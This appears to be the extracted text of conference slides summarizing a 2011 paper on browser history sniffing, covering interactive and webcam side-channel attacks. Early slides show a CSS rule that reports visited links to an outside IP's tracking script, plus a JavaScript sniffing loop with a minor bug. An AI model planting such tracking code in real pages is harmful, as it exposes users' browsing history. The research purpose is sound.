Zachary WeinbergEric Y. Chen

Pavithra Ramesh JayaramanCollin Jackson

Carnegie Mellon University

I Still Know What You Visited Last Summer: User interaction and side-channel attacks on browsing history

IEEE Symposium on Security and Privacy, May 2011

2

3

Outline

IntroductionAutomated AttacksExp 1: Interactive AttacksExp 2: Side-Channel AttacksRelated WorkConclusion

4

Introduction

History Sniffing through CSS :visited Andrew Clover, 2002,

http://seclists.org/bugtraq/2002/Feb/271in HTML<a id="link1" href="http://google.com/">Visit Google!</a>

in CSS#link1:visited {

color: red;background: url(http://140.115.53.28/track.php?url=google.com);

}

5

Introduction

L. David Baron, 2010, http://dbaron.org/mozilla/visited-privacy make getComputedStyle act as though all links are

unvisited make certain CSS selectors act as though links are

always unvisited limits the CSS properties that can be used to style

visited links to color, background-color, border-*-color, outline-color, column-rule-color, fill, and stroke

The latest versions of Firefox, Chrome, Safari, and IE all adopt this defense still vulnerable with interactive attacks

6

Introduction

Dongseok Jang et al., An Empirical Study of Privacy-Violating Information Flows in JavaScript Web Applications Small sets of links (6~220) probed by real exploiters

46 popular websites, including one from Alexa Top100This makes interactive attacks possible

7

Introduction

What can history sniffers do? Benign:

Websites could use history sniffing to determine whether their users have visited known phishing sites.

Websites could seed visitors’ history with URLs made up for the purpose, and use the URLs to re-identify their visitors. Cookies

Malicious: Track visitors across sites for advertising purpose,

determining whether they also visit a site’s competitors. Attackers can construct more targeted phishing pages, by

impersonating only sites that a particular victim is known to visit

8

Automated Attacks

Direct sniffing

<style> a:visited { color: red; } </style>

var url_array = new Array('http://a.com', 'http://b.com');var visited_array = new Array(); var link_el = document.createElement('a');var computed_style = document.defaultView.getComputedStyle(link_el,

""); for (var i = 0; i < url_array.length; i++) {

link_el.href = array[i]; if (computed_style.getPropertyValue("color") == 'rgb(255, 0, 0)'){ visited_array.push(url_array[i]); }

}

9

Automated Attacks

Indirect Sniffing Make visited and unvisited links take different

amounts of space, which causes unrelated elements on the page to move; inspect the positions of those other elements.

Make visited and unvisited links cause different images to load. background-image style used in :visited rule Not requires JavaScript

10

Automated Attacks

Side-channel sniffing Timing attacks

the attacker can make the page take longer to lay out if a link is visited than if it is unvisited Transparent Underline Any other style rules in :visited

Defense Baron’s solution does well for all 3 types

(direct/indirect/side-channel) above

11

Exp 1: Interactive Attacks

Require victims to interact with malicious sites The authors claim that interactive attacks can be disguised

as “normal” interactive tasks that users will not find surprising or suspicious

Amazon’s Mechanical Turk Recruit 307 participants

All tasks in this experiment operate within the constraints of Baron’s defense Visited-link styles only change the color on the screen Pretend to be CAPTCHA tests CAPTCHA: Completely Automated Public Turing test to

tell Computers and Humans Apart

12

Exp 1: Interactive Attacks

1. Word CAPTCHA

Each word is a hyperlink to an URL that the attacker wishes to probe

If unvisited, it is drawn in the same color as the background.

13

Exp 1: Interactive Attacks

2. Character CAPTCHA

Seven-segment LCD symbols Every letter represents 3 URLs Site-supplied font

14

Exp 1: Interactive Attacks

4 + 5 = 9 ; 4 + F = A ; 5 + F = 6 ; 4 + 5 + F = 8 “ – “ is always-on

15

Exp 1: Interactive Attacks

3. Chessboard puzzle Each square contains a URL Only the pawns corresponding to visited sites are made visible Using SVG or text to control the pawns

16

Exp 1: Interactive Attacks

4. Pattern matching puzzle

17

Exp 1: Interactive Attacks

Randomly generated task instances corresponding to known proportions of visited and unvisited links.

18

Exp 1: Interactive Attacks

Automated history-sniffing exploits on all the participants URL set from wtikay.com

7012 commonly visited URLs (from Alexa Top 5000)

19

Exp 1: Interactive Attacks

20

Exp 1: Interactive Attacks

21

Exp 1: Interactive Attacks

22

Exp 1: Interactive Attacks

23

Exp 1: Interactive Attacks

24

Exp 2: Side-channel Attacks

Webcam attacks <blink> Random 20 URLs with 10 visited ones Variant 1:

Designed to comply with the WCAG standard for seizure safety

Variant 2: Make entire browser window flash Brighter color

25

Exp 2: Side-channel Attacks

Author test 100% accuracy for both variants in all condition

Will-lit room Person stays still in front of the computer In a dark room, accuracy dropped to 50%

Field test 60 / 307 participants

26

Exp 2: Side-channel Attacks

Field test

27

Exp 2: Side-channel Attacks

In real life, ChatRoulette service

The attack works even when the closest reflector is a wall 10 to 20 feet away from the monitor

28

Related Work

Page cache Felten et al., Timing Attacks on Web Privacy

DNS cache Felten et al., Timing Attacks on Web Privacy

Both tactics above Only for the first time Short-term history

Loadable cross-origin but only available to logged-in users Facebook, Gmail, Twitter, etc. JavaScript onerror event

29

Related Work

Cookie, Flash Player local shared objectsAd-blocker, Private browsing mode

30

Conclusion

Automated history sniffing attacks have successfully been blocked by Baron’s solution

Interactive attacks are notThis paper developed POC of 6 history

sniffing exploited against Baron’s defense 4 interactive attacks 2 detection of the screen through webcam